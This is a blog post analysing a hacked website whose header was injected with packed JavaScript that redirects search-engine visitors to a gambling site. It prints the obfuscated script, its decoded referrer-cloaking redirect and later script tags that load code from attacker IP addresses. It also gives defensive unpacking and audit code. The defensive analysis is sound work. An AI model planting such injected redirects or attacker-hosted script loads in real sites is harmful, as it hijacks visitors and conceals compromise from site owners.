Notes on a tampered home page that automatically redirected to a gambling ("spinach") site
2022-07-03 21:22:00 【Magical star anise】
Preface #
A few days ago I searched Baidu for my former employer's website and suddenly found that the site description had become the introduction of a gambling ("spinach") site. That is the telltale sign of a hacked site.
Specifically, clicking through from the search engine automatically redirects to the gambling site, while entering the URL directly does not redirect.
Investigation #
Nothing can hide from the source code. A redirect like this usually sits in the header, where it fires quickly. Sure enough, I found the following piece of code in the header.
It is obfuscated with an eval packer, so it is not convenient to read.
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<4 8=\\"a\\">");2.3("d s=2.6");2.3("7(s.1(\\"9\\")>0 || s.1(\\"b\\")>0 || s.1(\\"c\\")>0 ||s.1(\\"r\\")>0 ||s.1(\\"e\\")>0 ||s.1(\\"f\\")>0 ||s.1(\\"g\\")>0 ||s.1(\\"h\\")>0 )");2.3("i.j=\\"k://l.m.n.o:p/q.5\\";");2.3("</4>");',29,29,'|indexOf|document|writeln|script|html|referrer|if|LANGUAGE|baidu|Javascript|sogou|soso|var|uc|bing|yahoo|so|location|href|http|103|37|233|13|888|bcs|sm|'.split('|'),0,{}))
After decryption:
<script LANGUAGE="Javascript">;
var s=document.referrer;
if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )
location.href="http://103.37.233.13:888/bcs.html";
</script>
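The packed blob can be decoded without executing it. The following is an added example, not code from the original post: it statically unpacks this packer format for a radix up to 36 (the blob above uses 29) and then collects what the resulting document.writeln calls would emit. The function names and the sample, which points at a reserved .invalid host, are constructed for illustration.

```javascript
// Added example: statically unpack a "p,a,c,k,e,r" blob; nothing is eval()'d.
const PACKED_RE =
  /\}\('((?:\\.|[^'\\])*)',(\d+),\d+,'((?:\\.|[^'\\])*)'\.split\('\|'\)/;

// Undo the backslash escapes of a JavaScript string literal (\\, \', \", \n).
const unescapeLiteral = (s) =>
  s.replace(/\\(.)/g, (_, ch) => (ch === 'n' ? '\n' : ch));

function unpack(source) {
  const m = PACKED_RE.exec(source);
  if (!m) return null; // not packed in this format
  const radix = Number(m[2]);
  if (radix < 2 || radix > 36) throw new RangeError('radix outside 2..36');
  const words = m[3].split('|');
  // Each word-like token is a dictionary index written in base `radix`; an
  // empty dictionary slot means the token stands for itself (k[c]||e(c)).
  return unescapeLiteral(m[1]).replace(/\b\w+\b/g, (tok) => {
    const idx = parseInt(tok, radix);
    const isIndex = !Number.isNaN(idx) && idx.toString(radix) === tok;
    return isIndex && words[idx] ? words[idx] : tok;
  });
}

// Second layer: collect the strings passed to document.writeln("...").
function writtenMarkup(code) {
  const out = [];
  for (const m of code.matchAll(/document\.writeln\("((?:\\.|[^"\\])*)"\)/g)) {
    out.push(unescapeLiteral(m[1]));
  }
  return out.join('\n');
}

// Constructed sample in the same shape as the blob above (packer body elided,
// destination replaced by a reserved .invalid name).
const SAMPLE =
  String.raw`eval(function(p,a,c,k,e,r){/*...*/return p}('1.2("<3>");1.2("4 s=1.5;");` +
  String.raw`1.2("6(s.7(\\"8\\")>0)9.a=\\"b://c.d/\\";");1.2("</3>");',14,14,` +
  String.raw`'|document|writeln|script|var|referrer|if|indexOf|baidu|location|href|http|example|invalid'` +
  String.raw`.split('|'),0,{}))`;

const layer1 = unpack(SAMPLE);
console.log(layer1);                // the document.writeln(...) calls
console.log(writtenMarkup(layer1)); // the <script> block they would write
```

To analyse a real sample, pass the text of the injected header script to unpack() in place of SAMPLE.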
Principle #
- Get the referrer (where the visitor came from)
- Check whether it matches one of the listed search engines
- If so, redirect to the specified page
The search engines matched by this code basically cover the mainstream domestic ones (Baidu, Sogou, 360 Search, Shenma, UC, Bing, Yahoo). As long as you arrive through a search on one of these, you are redirected to the gambling site.
Entering the website address directly does not trigger the redirect, so it has a certain degree of concealment.
Solution #
- Just delete this piece of JS code
- Check for server or program vulnerabilities and find out why the site was compromised. Servers being used for mining is also very common now, so after being hacked, pay extra attention to whether a miner has been installed
Follow-up #
I found that they had upgraded. This was inserted in the head:
<script type="text/javascript" rel="nofollow" src="http://103.30.4.96:7889/js/SCur.js" ></script>
They also added Baidu statistics:
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?9a4c62a1985e8fbd8d0ce7c1a54070d1";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
document.write("<script language=\"javascript\" type=\"text/javascript\" src=\"http://103.30.4.96:7889/js/PicLeft.js\"></script>");
The principle is still the same, but statistics have been added, probably to make it easier to monitor the number of views. There are more jumps, which also makes it convenient for them to change the controlling script.
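Both variants leave recognisable traces in the served HTML. The following is an added example, not code from the original post: a heuristic audit that reports scripts loaded from IP-literal or unlisted hosts, packed inline scripts, and inline scripts that redirect depending on document.referrer. The trusted host list, site URL and sample pages are assumptions constructed for illustration.

```javascript
// Added example: heuristic audit of page HTML for the injection patterns above.
// Assumption: the site's own script hosts; everything else is reported.
const TRUSTED_HOSTS = new Set(['www.example.com']);
const SITE_BASE = 'https://www.example.com/'; // hypothetical site URL

// Crude regex extraction of <script> elements; enough for a tripwire.
function scriptElements(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].map((m) => ({
    src: (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]) || [])[1] || null,
    body: m[2],
  }));
}

function auditPage(html) {
  const findings = [];
  for (const { src, body } of scriptElements(html)) {
    if (src) {
      let host;
      try { host = new URL(src, SITE_BASE).hostname; } catch { host = ''; }
      if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host) || host.startsWith('[')) {
        findings.push(`script loaded from IP-literal host: ${src}`);
      } else if (!TRUSTED_HOSTS.has(host)) {
        findings.push(`script loaded from untrusted host: ${src}`);
      }
    }
    if (/eval\(function\(p,a,c,k,e,[rd]\)/.test(body)) {
      findings.push('packed inline script (p,a,c,k,e,r)');
    }
    if (/document\.referrer/.test(body) &&
        /location(\.href)?\s*=[^=]|location\.(replace|assign)\(/.test(body)) {
      findings.push('inline script redirects depending on document.referrer');
    }
  }
  return findings;
}

// Constructed pages: 192.0.2.10 and example.invalid are reserved test values.
const CLEAN = '<head><script src="/js/app.js"></script></head>';
const TAMPERED = `<head><script src="/js/app.js"></script>
<script type="text/javascript" rel="nofollow" src="http://192.0.2.10:8080/js/a.js" ></script>
<script>var s=document.referrer;
if(s.indexOf("baidu")>0)location.href="http://example.invalid/";</script>
<script>eval(function(p,a,c,k,e,r){return p}('0',1,1,''.split('|'),0,{}))</script></head>`;

console.log(auditPage(CLEAN));
console.log(auditPage(TAMPERED));
```

Running this on a schedule against the live home page and alerting on any non-empty result catches a re-injection like the one in this follow-up.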
I sent a reminder to my former colleagues. I also searched around and found that quite a few websites had been hacked by similar methods. For some of the websites with contact information, I sent a reminder as well. I was hoping to receive a thank-you, but the result .........